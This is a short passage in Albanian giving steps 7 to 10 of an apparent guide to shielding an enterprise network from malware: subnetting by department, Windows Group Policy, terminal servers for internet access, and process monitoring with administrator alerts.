Hapi 7 Ndarja e një rrjeti ndërmarrjesh në nënrrjeta. Është i përshtatshëm për të thyer rrjetin sipas parimit: një departament në një nënrrjet, një departament tjetër në një tjetër. Nënrrjetet mund të ndahen në shtresën fizike (SCS), në shtresën e lidhjes së të dhënave (VLAN), në shtresën e rrjetit (nënrrjetet që nuk kryqëzohen nga adresat ip).

Hapi 8 Windows ka një mjet të mrekullueshëm për menaxhimin e sigurisë së grupeve të mëdha të kompjuterëve - këto janë politikat e grupit (GPO). Nëpërmjet GPO, ju mund të konfiguroni kompjuterët dhe serverët në mënyrë që infeksioni dhe shpërndarja e malware të bëhet pothuajse e pamundur.

Hapi 9 Akses në terminal. Ngritja e 1-2 serverëve terminalë në rrjet përmes të cilëve përdoruesit do të hyjnë në internet dhe probabiliteti i infektimit të kompjuterëve të tyre personal do të bjerë në zero.

Hapi 10 Mbajtja e gjurmëve të të gjitha proceseve dhe shërbimeve që funksionojnë në kompjuterë dhe serverë. Mund ta bëni që kur të nisë një proces (shërbim) i panjohur, të njoftohet administratori i sistemit. Softueri komercial që mund ta bëjë këtë kushton shumë, por në disa raste kostot janë të justifikuara.

Lart